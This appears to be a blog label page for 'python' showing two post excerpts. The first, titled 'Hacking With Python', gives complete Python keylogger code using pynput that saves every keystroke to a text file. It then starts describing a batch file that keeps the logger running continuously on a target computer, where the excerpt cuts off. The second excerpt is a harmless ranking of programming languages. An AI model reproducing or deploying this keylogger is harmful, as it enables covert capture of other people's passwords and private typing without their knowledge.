Posts

Showing posts with the label python

Hacking With Python in Just 10 lines of Code | Key Logger

Image
Hacking With Python in Just 10 lines of Code - A Key Logger             A KeyLogger logs every stroke of the keyboard into a seperate file . This is a basic keylogger which we can run on a computer we need to log the strokes .  The 2 main Packages needed are : Python Pynput And that is all we needed .  Once you have them installed copy and paste the following code : from pynput.keyboard import Key , Listener keys=[] def on_press(key): keys.append(key) d=open("C:/Users/DELL/Desktop/logofmaniacs.txt","w") d.write(str(keys)) d.close() with Listener(on_press) as listner: listner.join() Save the file in .py extension and Run the Code pressing F5 . The code starts executing and once you start typing a new text file logofmaniacs.txt is created and has all keystrokes logged .  But once the execution is stopped the keylogging also stops . To make it run continuously we create a batch file . Crea...

Top 5 Programming Languages to Learn

Image
Top 5 Programming Languages to Learn                        To Start with a Disclaimer , There is no Best or Worst Language . Each one is unique in its own way . This is only a comparision to help in choosing a language to learn . Basis on which the following List is made :  Trends of the language Companies that are used Available Support , Frameworks and Libraries What can be done with them Job opportunities Learning curve Lets Start on the list from 5 to 1 : 5 . DART :             DART is a programming language initially internally used at Google.It was there since 2011 but only gained attention after the announcement of Flutter beta for cross-platform(both android and IOS) mobile app development. It is simple,modern and highly efficient as apps can be developed with a single code base . Companies Using DART: Google Alibaba Wrike Pick & School 4 . GO Lang :       ...